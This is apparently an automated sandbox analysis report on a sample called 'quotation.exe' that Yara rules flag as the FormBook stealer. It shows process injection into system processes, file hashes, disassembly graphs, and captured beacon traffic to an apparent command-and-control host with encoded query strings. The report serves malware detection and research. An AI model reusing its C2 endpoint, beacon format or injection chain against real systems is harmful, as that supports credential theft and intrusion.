                                                                                Data Raw: 50 4c 70 44 3d 39 61 59 4c 69 59 66 56 67 52 56 30 48 6a 75 2f 4c 6c 70 5a 32 66 4c 34 61 4d 32 53 30 55 6a 66 62 2b 70 42 69 35 47 77 34 58 53 34 65 6c 54 4c 39 41 65 31 74 2f 6f 37 70 68 57 52 6d 50 6e 73 37 44 4d 4a 2b 74 45 46 71 55 39 45 46 53 52 6c 45 44 54 35 30 30 52 47 6d 2f 38 6c 4d 63 49 41 66 78 55 6b 30 49 78 76 5a 4c 49 66 7a 56 67 39 42 59 4b 56 4b 67 68 48 6f 44 62 43 6c 76 4f 2f 69 54 32 45 78 6e 4f 39 41 62 54 46 65 4c 76 47 73 56 79 6f 6f 50 35 59 6b 4c 37 31 71 37 74 54 67 35 75 50 4b 44 4b 4e 68 30 4c 4e 59 61 45 35 6d 69 6a 4d 4a 35 51 63 62 38 50 70 2f 45 61 66 76 77 37 2b 4c 69 56 37 2b 67 69 52 45 67 51 70 38 42 50 61 52 2f 77 51 57 73 31 2b 38 4a 6f 6b 4c 2f 36 73 51 5a 57 76 42 39 39 73 53 35 6c 79 49 57 69 75 2b 63 78 47 55 72 49 61 36 36 72 31 71 32 79 31 46 65 4e 74 58 39 4d 4b 39 79 59 70 4c 64 51 77 71 78 6b 6a 57 48 41 6d 61 67 68 58 50 47 70 33 4b 41 56 6c 4a 39 71 63 64 37 61 69 53 59 6a 58 70 69 6c 38 36 49 30 30 4b 4c 54 37 62 39 79 30 62 32 54 39 6a 6b 64 4d 43 [TRUNCATED]
                                                                                Data Ascii: PLpD=9aYLiYfVgRV0Hju/LlpZ2fL4aM2S0Ujfb+pBi5Gw4XS4elTL9Ae1t/o7phWRmPns7DMJ+tEFqU9EFSRlEDT500RGm/8lMcIAfxUk0IxvZLIfzVg9BYKVKghHoDbClvO/iT2ExnO9AbTFeLvGsVyooP5YkL71q7tTg5uPKDKNh0LNYaE5mijMJ5Qcb8Pp/Eafvw7+LiV7+giREgQp8BPaR/wQWs1+8JokL/6sQZWvB99sS5lyIWiu+cxGUrIa66r1q2y1FeNtX9MK9yYpLdQwqxkjWHAmaghXPGp3KAVlJ9qcd7aiSYjXpil86I00KLT7b9y0b2T9jkdMCIOANbXkCs+V/Jf9Y/eunTPuD2QTjsTL0WmOOJKLOa7zhzc+M95oEg9FmUdMNgZ72OnkgN85uv6t4+TpAupntyiDxng/Cpjuk9X5m2Qu0jPCxyF6kErFYt4LZgKPQwc6HNpoCBopUoD51xOGRY3igL7sIutg0KAGq369NOcN+VEeXiPGUhw2Ylka1clHlLx4snVu7UbD9r12lA6zryKac8n7iRhReLgJ/q5DjFP7Hc0T7t+NtG5l3mcA5Yvy/dogqZUjOgfxbbpI3gffcWKJNHH4oss80YsWVmFDu30co0IOrP3x4rkq5YvLMHoqDSSfYaANLQM1nuLcm7muo8fXi6E7QeYo47mhLqnVaMVYmVKrkwL31FvWHhoETP1PFsE9u814gSarf3MZ7fLSDHvcpEPD4aZKHyPT0prf2XhX1QVNoijfaRRxzoYecqmpCviCSpb9Eqcu8RW1JJ8krqMjkBEKV/RzyY8UtYroDSfjeiOe081/4LtxOSek0kW+OcqN8s4m4iqPoNDJvB1TlmgeMu1vOTKymM3BWJz+kaTlGh55ZB9PF2DzR58Sfl/fSge8pZ8qDI8F+hs4cWhtyY8e40aMks68rM0RKtmzJo2Dz9AoANNcOhnI1QHmxEw/iUaB+2zbkyoXX2sG6rIDphXpXPaVf52fVrs66GT [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                48192.168.2.550029154.70.82.246803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:17:13.049207926 CET527OUTGET /lqxd/?PLpD=wYwrhtOuglxnIn28LlpI4+LrVvqM62/DKK1NgpC20GbgYEDR8w6xmbtuhBCgj8a/1RMYy9cnrRcVYl1JPFOGzEFXxYAuHOIed0EYkcd0fYA++UMHJ9G8Ni1crzSH6uPj0A==&dfxXf=5pgPlrExEj HTTP/1.1
                                                                                Host: www.conseilnsaftogo.org
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:17:16.246164083 CET482INHTTP/1.1 301 Moved Permanently
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:17:15 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Content-Length: 0
                                                                                Connection: close
                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                X-Redirect-By: WordPress
                                                                                Location: http://conseilnsaftogo.org/lqxd/?PLpD=wYwrhtOuglxnIn28LlpI4+LrVvqM62/DKK1NgpC20GbgYEDR8w6xmbtuhBCgj8a/1RMYy9cnrRcVYl1JPFOGzEFXxYAuHOIed0EYkcd0fYA++UMHJ9G8Ni1crzSH6uPj0A==&dfxXf=5pgPlrExEj


                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                General

                                                                                Target ID:0
                                                                                Start time:08:13:09
                                                                                Start date:03/12/2024
                                                                                Path:C:\Users\user\Desktop\quotation.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\quotation.exe"
                                                                                Imagebase:0xa00000
                                                                                File size:814'592 bytes
                                                                                MD5 hash:FB56FBFA78C904B961A8DB42B7AC648D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:3
                                                                                Start time:08:13:13
                                                                                Start date:03/12/2024
                                                                                Path:C:\Users\user\Desktop\quotation.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\quotation.exe"
                                                                                Imagebase:0x630000
                                                                                File size:814'592 bytes
                                                                                MD5 hash:FB56FBFA78C904B961A8DB42B7AC648D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2381813983.0000000001110000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2381205965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2382864377.0000000001790000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:5
                                                                                Start time:08:13:36
                                                                                Start date:03/12/2024
                                                                                Path:C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe"
                                                                                Imagebase:0xb50000
                                                                                File size:140'800 bytes
                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4520455593.00000000030F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:6
                                                                                Start time:08:13:37
                                                                                Start date:03/12/2024
                                                                                Path:C:\Windows\SysWOW64\SearchProtocolHost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\SysWOW64\SearchProtocolHost.exe"
                                                                                Imagebase:0x3d0000
                                                                                File size:340'992 bytes
                                                                                MD5 hash:727FE964E574EEAF8917308FFF0880DE
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4520387201.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4520451404.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:moderate
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:7
                                                                                Start time:08:13:50
                                                                                Start date:03/12/2024
                                                                                Path:C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe"
                                                                                Imagebase:0xb50000
                                                                                File size:140'800 bytes
                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4522340469.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:9
                                                                                Start time:08:14:02
                                                                                Start date:03/12/2024
                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                Imagebase:0x7ff79f9e0000
                                                                                File size:676'768 bytes
                                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Disassembly

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:8.6%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:10
                                                                                  Total number of Limit Nodes:2
                                                                                  execution_graph 11529 2bc7d58 11531 2bc7d5b 11529->11531 11530 2bc7e5c 11530->11530 11531->11530 11533 2bc796c 11531->11533 11534 2bc8de8 CreateActCtxA 11533->11534 11536 2bc8eab 11534->11536 11537 2bce920 11538 2bce968 GetModuleHandleW 11537->11538 11539 2bce962 11537->11539 11540 2bce995 11538->11540 11539->11538

                                                                                  Executed Functions

                                                                                  Function 02BC2290 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 618 2bc2290-2bc22bd call 2bc2688 620 2bc22c3 618->620 621 2bc22c8-2bc22dd 620->621 622 2bc253a-2bc254c 621->622 623 2bc22e3 621->623 623->620 623->622 624 2bc249e-2bc24a1 623->624 625 2bc24da-2bc24e6 623->625 626 2bc24b4-2bc24ba 623->626 627 2bc2310-2bc2316 623->627 628 2bc23b1-2bc23b4 623->628 629 2bc2412-2bc241f 623->629 630 2bc2473-2bc247e 623->630 631 2bc2513-2bc251f 623->631 632 2bc232d-2bc2333 623->632 633 2bc238f-2bc239c 623->633 634 2bc244a-2bc2453 623->634 635 2bc22ea-2bc22f3 623->635 636 2bc24eb-2bc24fb 623->636 637 2bc2424-2bc2445 623->637 638 2bc2524-2bc2527 623->638 639 2bc23e7-2bc23ed 623->639 640 2bc23c7-2bc23cd 623->640 641 2bc2500-2bc250e 623->641 642 2bc2400-2bc240d 623->642 643 2bc2380-2bc238a 623->643 644 2bc23a1-2bc23ac 623->644 645 2bc2483-2bc2499 623->645 650 2bc24aa 624->650 651 2bc24a3-2bc24a8 624->651 625->621 646 2bc254f-2bc2561 626->646 653 2bc24c0-2bc24d5 626->653 627->646 649 2bc231c-2bc232b 627->649 654 2bc23bd 628->654 655 2bc23b6-2bc23bb 628->655 629->621 630->621 631->621 632->646 652 2bc2339-2bc2349 632->652 633->621 634->646 647 2bc2459-2bc246e 634->647 635->646 648 2bc22f9-2bc230e 635->648 636->621 637->621 656 2bc2529-2bc252e 638->656 657 2bc2530 638->657 659 2bc23ef-2bc23f4 639->659 660 2bc23f6 639->660 640->646 658 2bc23d3-2bc23e2 640->658 641->621 642->621 643->621 644->621 645->621 647->621 648->621 649->621 663 2bc24af 650->663 651->663 652->646 664 2bc234f-2bc235f 652->664 653->621 665 2bc23c2 654->665 655->665 666 2bc2535 656->666 657->666 658->621 667 2bc23fb 659->667 660->667 663->621 664->646 669 2bc2365-2bc237b 664->669 665->621 666->621 667->621 669->621
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082479816.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2bc0000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: O1i$uD c
                                                                                  • API String ID: 0-1293147713
                                                                                  • Opcode ID: 3de31484de9b1750f402bfe7135c13538230f2b797884329d99a7c95ef45646c
                                                                                  • Instruction ID: c0f984f9034c6f53a3db8351ee1247f3c3e1378b3eaacfc2c21e8ddaa0b048d8
                                                                                  • Opcode Fuzzy Hash: 3de31484de9b1750f402bfe7135c13538230f2b797884329d99a7c95ef45646c
                                                                                  • Instruction Fuzzy Hash: DA71F871604211CFD745CF28D59092ABBB5FB8130076699EADC82EF36AD730ED81CB56
                                                                                  Function 02BC0F04 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 674 2bc0f04-2bc1010 call 2bc00e4 681 2bc1016 674->681 682 2bc101b-2bc1030 681->682 683 2bc10ea-2bc112c call 2bc00f4 682->683 684 2bc1036 682->684 704 2bc112e call 2bc18ec 683->704 705 2bc112e call 2bc19f8 683->705 706 2bc112e call 2bc196a 683->706 707 2bc112e call 2bc1a6a 683->707 708 2bc112e call 2bc19ca 683->708 709 2bc112e call 2bc1a35 683->709 710 2bc112e call 2bc1a25 683->710 711 2bc112e call 2bc1a90 683->711 712 2bc112e call 2bc1a80 683->712 684->681 684->683 685 2bc10cc-2bc10e5 684->685 686 2bc103d-2bc1067 684->686 687 2bc1099-2bc10b0 684->687 688 2bc1069-2bc1075 684->688 689 2bc108a-2bc1097 684->689 690 2bc10b5-2bc10c7 684->690 691 2bc1077-2bc107a 684->691 685->682 686->682 687->682 688->682 689->682 690->682 693 2bc107c-2bc1081 691->693 694 2bc1083 691->694 698 2bc1088 693->698 694->698 698->682 703 2bc1134-2bc113d 704->703 705->703 706->703 707->703 708->703 709->703 710->703 711->703 712->703
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082479816.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2bc0000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Teeq$Teeq
                                                                                  • API String ID: 0-1240912287
                                                                                  • Opcode ID: 530a2dd9cbe665c548dcd0e275b34d374927391950c679597b608f701abfe6c9
                                                                                  • Instruction ID: 2602739387457f2f03cc193b5d4a96f6904c87d4214a5886b47e52f7cab2fa5d
                                                                                  • Opcode Fuzzy Hash: 530a2dd9cbe665c548dcd0e275b34d374927391950c679597b608f701abfe6c9
                                                                                  • Instruction Fuzzy Hash: 7851F4B1E142868FC705DFA884956AEBFF2FF95310F29449EC849AB362D7348D05CB91
                                                                                  Function 02BC0FB0 Relevance: 2.6, Strings: 2, Instructions: 121COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 713 2bc0fb0-2bc1010 call 2bc00e4 720 2bc1016 713->720 721 2bc101b-2bc1030 720->721 722 2bc10ea-2bc112c call 2bc00f4 721->722 723 2bc1036 721->723 743 2bc112e call 2bc18ec 722->743 744 2bc112e call 2bc19f8 722->744 745 2bc112e call 2bc196a 722->745 746 2bc112e call 2bc1a6a 722->746 747 2bc112e call 2bc19ca 722->747 748 2bc112e call 2bc1a35 722->748 749 2bc112e call 2bc1a25 722->749 750 2bc112e call 2bc1a90 722->750 751 2bc112e call 2bc1a80 722->751 723->720 723->722 724 2bc10cc-2bc10e5 723->724 725 2bc103d-2bc1067 723->725 726 2bc1099-2bc10b0 723->726 727 2bc1069-2bc1075 723->727 728 2bc108a-2bc1097 723->728 729 2bc10b5-2bc10c7 723->729 730 2bc1077-2bc107a 723->730 724->721 725->721 726->721 727->721 728->721 729->721 732 2bc107c-2bc1081 730->732 733 2bc1083 730->733 737 2bc1088 732->737 733->737 737->721 742 2bc1134-2bc113d 743->742 744->742 745->742 746->742 747->742 748->742 749->742 750->742 751->742
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082479816.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2bc0000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Teeq$Teeq
                                                                                  • API String ID: 0-1240912287
                                                                                  • Opcode ID: 650638d7028d847bc061704e3557abccc63ad149a581d52a0de2089b7cc59016
                                                                                  • Instruction ID: 52dded13283ab5af96e8703b7f723d17e6c1cd39eea4d2ee100777b6bff12000
                                                                                  • Opcode Fuzzy Hash: 650638d7028d847bc061704e3557abccc63ad149a581d52a0de2089b7cc59016
                                                                                  • Instruction Fuzzy Hash: E1418170A101598FCB04DFA9C89467FBAB6FF88310F24806AD519FB3A5CB749D01CB91
                                                                                  Function 02BC21EE Relevance: 1.5, Strings: 1, Instructions: 218COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 752 2bc21ee-2bc223c 753 2bc223e-2bc2259 752->753 754 2bc225b-2bc22bd call 2bc2688 752->754 753->754 757 2bc22c3 754->757 758 2bc22c8-2bc22dd 757->758 759 2bc253a-2bc254c 758->759 760 2bc22e3 758->760 760->757 760->759 761 2bc249e-2bc24a1 760->761 762 2bc24da-2bc24e6 760->762 763 2bc24b4-2bc24ba 760->763 764 2bc2310-2bc2316 760->764 765 2bc23b1-2bc23b4 760->765 766 2bc2412-2bc241f 760->766 767 2bc2473-2bc247e 760->767 768 2bc2513-2bc251f 760->768 769 2bc232d-2bc2333 760->769 770 2bc238f-2bc239c 760->770 771 2bc244a-2bc2453 760->771 772 2bc22ea-2bc22f3 760->772 773 2bc24eb-2bc24fb 760->773 774 2bc2424-2bc2445 760->774 775 2bc2524-2bc2527 760->775 776 2bc23e7-2bc23ed 760->776 777 2bc23c7-2bc23cd 760->777 778 2bc2500-2bc250e 760->778 779 2bc2400-2bc240d 760->779 780 2bc2380-2bc238a 760->780 781 2bc23a1-2bc23ac 760->781 782 2bc2483-2bc2499 760->782 787 2bc24aa 761->787 788 2bc24a3-2bc24a8 761->788 762->758 783 2bc254f-2bc2561 763->783 790 2bc24c0-2bc24d5 763->790 764->783 786 2bc231c-2bc232b 764->786 791 2bc23bd 765->791 792 2bc23b6-2bc23bb 765->792 766->758 767->758 768->758 769->783 789 2bc2339-2bc2349 769->789 770->758 771->783 784 2bc2459-2bc246e 771->784 772->783 785 2bc22f9-2bc230e 772->785 773->758 774->758 793 2bc2529-2bc252e 775->793 794 2bc2530 775->794 796 2bc23ef-2bc23f4 776->796 797 2bc23f6 776->797 777->783 795 2bc23d3-2bc23e2 777->795 778->758 779->758 780->758 781->758 782->758 784->758 785->758 786->758 800 2bc24af 787->800 788->800 789->783 801 2bc234f-2bc235f 789->801 790->758 802 2bc23c2 791->802 792->802 803 2bc2535 793->803 794->803 795->758 804 2bc23fb 796->804 797->804 800->758 801->783 806 2bc2365-2bc237b 801->806 802->758 803->758 804->758 806->758
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082479816.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2bc0000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: O1i
                                                                                  • API String ID: 0-2683086037
                                                                                  • Opcode ID: 5e0136885e276db340d4b2486a62d29eebde58179ab1d02c34bd51a8c3dd9323
                                                                                  • Instruction ID: 88508ab8b8d6642485ce3fc403295bdf184bc894117ef74ae7142be69a04c69b
                                                                                  • Opcode Fuzzy Hash: 5e0136885e276db340d4b2486a62d29eebde58179ab1d02c34bd51a8c3dd9323
                                                                                  • Instruction Fuzzy Hash: 7C913472604141CFC7158F28C59496ABBB1FB81300BAB85DADC85AF357D730EA46CB92
                                                                                  Function 02BCA46B Relevance: .2, Instructions: 197COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082479816.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2bc0000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4d2c3cc50ee02b7751fb77899f10c1599d3efd7e2373350b661a747d23479154
                                                                                  • Instruction ID: ab7bf4a48e5f1609f9e745b883fecac88dbeea58f37044302cc7baac1a2b812f
                                                                                  • Opcode Fuzzy Hash: 4d2c3cc50ee02b7751fb77899f10c1599d3efd7e2373350b661a747d23479154
                                                                                  • Instruction Fuzzy Hash: 7E61E4707002058FCB16BBB8C49566EBAA7EFC4340B25C86ED41ACB795DF74DD428B90
                                                                                  Function 02BC7328 Relevance: .2, Instructions: 194COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082479816.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2bc0000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6d04e0f431588d878cbf046036c9a081066ef5a61d7df11fbb50b03c9023b1eb
                                                                                  • Instruction ID: 802a70c5fb66a127069b673a4fd49b7b5bd877ab823806a7dd67dd2c68c2599a
                                                                                  • Opcode Fuzzy Hash: 6d04e0f431588d878cbf046036c9a081066ef5a61d7df11fbb50b03c9023b1eb
                                                                                  • Instruction Fuzzy Hash: 7861E3707006058FCB19BBB8C49566EBAABEFC4340B24C86ED41ADB795DF34DD428B80
                                                                                  Function 02BC0860 Relevance: .1, Instructions: 77COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082479816.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2bc0000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2b0e271bbc3f87ed6cbad7f5cce626a5cd64a5a546dec4c1c3f4c5756764fb75
                                                                                  • Instruction ID: e17abe4ada4fcb4f338bd1aca15c9f1f0da9cf6b44f61eebf2ed87e59355a2e9
                                                                                  • Opcode Fuzzy Hash: 2b0e271bbc3f87ed6cbad7f5cce626a5cd64a5a546dec4c1c3f4c5756764fb75
                                                                                  • Instruction Fuzzy Hash: AD31BFB0E29349CFCB51DF68C48049EBBB5FF4A200B60CAABD4259B506C331E885CB90
                                                                                  Function 02BC8DDC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 573 2bc8ddc-2bc8de2 574 2bc8deb-2bc8dee 573->574 575 2bc8de4-2bc8de6 573->575 576 2bc8def-2bc8ea9 CreateActCtxA 574->576 575->576 577 2bc8de8-2bc8de9 575->577 579 2bc8eab-2bc8eb1 576->579 580 2bc8eb2-2bc8f0c 576->580 577->574 579->580 587 2bc8f0e-2bc8f11 580->587 588 2bc8f1b-2bc8f1f 580->588 587->588 589 2bc8f30 588->589 590 2bc8f21-2bc8f2d 588->590 592 2bc8f31 589->592 590->589 592->592
                                                                                  APIs
                                                                                  • CreateActCtxA.KERNEL32(?), ref: 02BC8E99
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082479816.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2bc0000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID: ~MPc
                                                                                  • API String ID: 2289755597-3169221526
                                                                                  • Opcode ID: 4ab5efbb359903fde007c45f9643d86a002f48ff82b937bd3c0b554db9170eed
                                                                                  • Instruction ID: cacfcb78f5da2b10b5fb9e37c9613dc3f8f96577cf447e8e277762544ec2c115
                                                                                  • Opcode Fuzzy Hash: 4ab5efbb359903fde007c45f9643d86a002f48ff82b937bd3c0b554db9170eed
                                                                                  • Instruction Fuzzy Hash: D241DFB1C00719CFDB25CFA9C844BDEBBB5AF49304F20819AD508AB265DB756949CF90
                                                                                  Function 02BC796C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 593 2bc796c-2bc8ea9 CreateActCtxA 598 2bc8eab-2bc8eb1 593->598 599 2bc8eb2-2bc8f0c 593->599 598->599 606 2bc8f0e-2bc8f11 599->606 607 2bc8f1b-2bc8f1f 599->607 606->607 608 2bc8f30 607->608 609 2bc8f21-2bc8f2d 607->609 611 2bc8f31 608->611 609->608 611->611
                                                                                  APIs
                                                                                  • CreateActCtxA.KERNEL32(?), ref: 02BC8E99
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082479816.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2bc0000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID: ~MPc
                                                                                  • API String ID: 2289755597-3169221526
                                                                                  • Opcode ID: 7adca0c6e67d12d19f15e7535de14f20310670500516a31f6c9588cfda711a0c
                                                                                  • Instruction ID: 04d20bbfdb460fc267ba5d863c391960ef4bfa7be90b677ec1acbb436ac09abe
                                                                                  • Opcode Fuzzy Hash: 7adca0c6e67d12d19f15e7535de14f20310670500516a31f6c9588cfda711a0c
                                                                                  • Instruction Fuzzy Hash: 6741DFB0C00719CBDB25CFA9C844BDEBBF5BF49304F2081AAD508AB255DBB56945CF90
                                                                                  Function 02BCE920 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 612 2bce920-2bce960 613 2bce968-2bce993 GetModuleHandleW 612->613 614 2bce962-2bce965 612->614 615 2bce99c-2bce9b0 613->615 616 2bce995-2bce99b 613->616 614->613 616->615
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 02BCE986
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2082479816.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2bc0000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID: ~MPc
                                                                                  • API String ID: 4139908857-3169221526
